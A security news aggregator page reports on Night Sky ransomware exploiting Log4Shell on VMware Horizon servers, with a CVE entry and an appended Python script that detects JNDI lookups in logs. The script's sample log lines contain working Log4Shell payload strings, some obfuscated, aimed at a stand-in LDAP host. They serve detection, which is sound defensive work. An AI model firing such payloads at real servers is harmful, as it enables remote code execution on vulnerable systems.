Night Sky ransomware uses Log4j bug to hack VMware Horizon servers
2022-01-11 11:24

The Night Sky ransomware gang has started to exploit the critical CVE-2021-44228 vulnerability in the Log4j logging library, also known as Log4Shell, to gain access to VMware Horizon systems.

Spotted in late December 2021 by security researcher MalwareHunterTeam, Night Sky ransomware focuses on locking enterprise networks.

On Monday, Microsoft published a warning about a new campaign from a China-based actor it tracks as DEV-0401 to exploit the Log4Shell vulnerability on VMware Horizon systems exposed on the internet, and deploy Night Sky ransomware.

It is believed that Night Sky is a continuation of the aforementioned ransomware operations.

Microsoft notes that Night Sky ransomware operators rely on command and control servers that impersonate domains used by legitimate companies, such as the cybersecurity firms Sophos and Trend Micro and the technology companies Nvidia and Rogers Corporation.

Microsoft's warning comes on the heels of another alert, issued by the UK's National Health Service on January 5, about threat actors targeting VMware Horizon deployments with Log4Shell exploits.


News URL

https://www.bleepingcomputer.com/news/security/night-sky-ransomware-uses-log4j-bug-to-hack-vmware-horizon-servers/

Related Vulnerability

DATE        CVE             VULNERABILITY TITLE                                                   RISK
2021-12-10  CVE-2021-44228  Deserialization of Untrusted Data vulnerability in multiple products  10.0
            Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.
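The Horizon intrusions described above depend on the weakness in the vulnerability entry: a JNDI lookup string that reaches a Log4j log message. As an added example (not part of this article or of any vendor tooling), the Python below scans web-access log lines for such lookups, undoing URL encoding and the nested lower/upper and ":-" default-value lookups attackers use to evade naive string matching; the log format, the sample lines and the documentation address 198.51.100.7 are assumptions.

```python
import re
from urllib.parse import unquote

# Innermost ${...} token: its body has no braces, so nested lookups collapse inside-out.
LOOKUP_RE = re.compile(r"\$\{([^{}]*)\}")

def _resolve(match):
    """Evaluate the simple lookups attackers nest to hide the literal string 'jndi'."""
    body = match.group(1)
    head, sep, rest = body.partition(":")
    if head.lower() == "jndi":
        return match.group(0)  # keep the JNDI lookup itself so the caller can flag it
    if ":-" in body:  # ${::-j} and ${env:UNSET:-j} evaluate to the text after ':-'
        return body.rsplit(":-", 1)[1]
    if sep and head.lower() == "lower":
        return rest.lower()
    if sep and head.lower() == "upper":
        return rest.upper()
    return match.group(0)  # ${date:...} and other lookups: not a JNDI indicator, leave as-is

def normalise(text):
    """URL-decode, then collapse nested lookups repeatedly until nothing changes."""
    text = unquote(text)
    previous = None
    while previous != text:
        previous = text
        text = LOOKUP_RE.sub(_resolve, text)
    return text

def is_jndi_lookup(line):
    return "${jndi:" in normalise(line).lower()

def find_jndi_attempts(lines):
    """Return (index, normalised line) for each log line that carries a JNDI lookup."""
    return [(i, normalise(l)) for i, l in enumerate(lines) if is_jndi_lookup(l)]

# Constructed sample access-log lines (not real traffic); 198.51.100.7 is a documentation address.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Jan/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Jan/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7/x}"',
    '10.0.0.9 - - [11/Jan/2022:10:01:09 +0000] "GET /portal/?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [11/Jan/2022:10:01:12 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://198.51.100.7/x}"',
    '10.0.0.3 - - [11/Jan/2022:10:02:00 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${date:yyyy}"',
]

if __name__ == "__main__":
    for idx, hit in find_jndi_attempts(SAMPLE_LOG):
        print(f"line {idx}: {hit}")
```

A hit only tells you a lookup string arrived; whether it was evaluated depends on the Log4j version in the vulnerable range listed above, so pair this with an inventory of log4j-core versions on the Horizon hosts.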

Related vendor

VENDOR LAST 12M #/PRODUCTS LOW MEDIUM HIGH CRITICAL TOTAL VULNS
VMware 186 83 405 205 107 800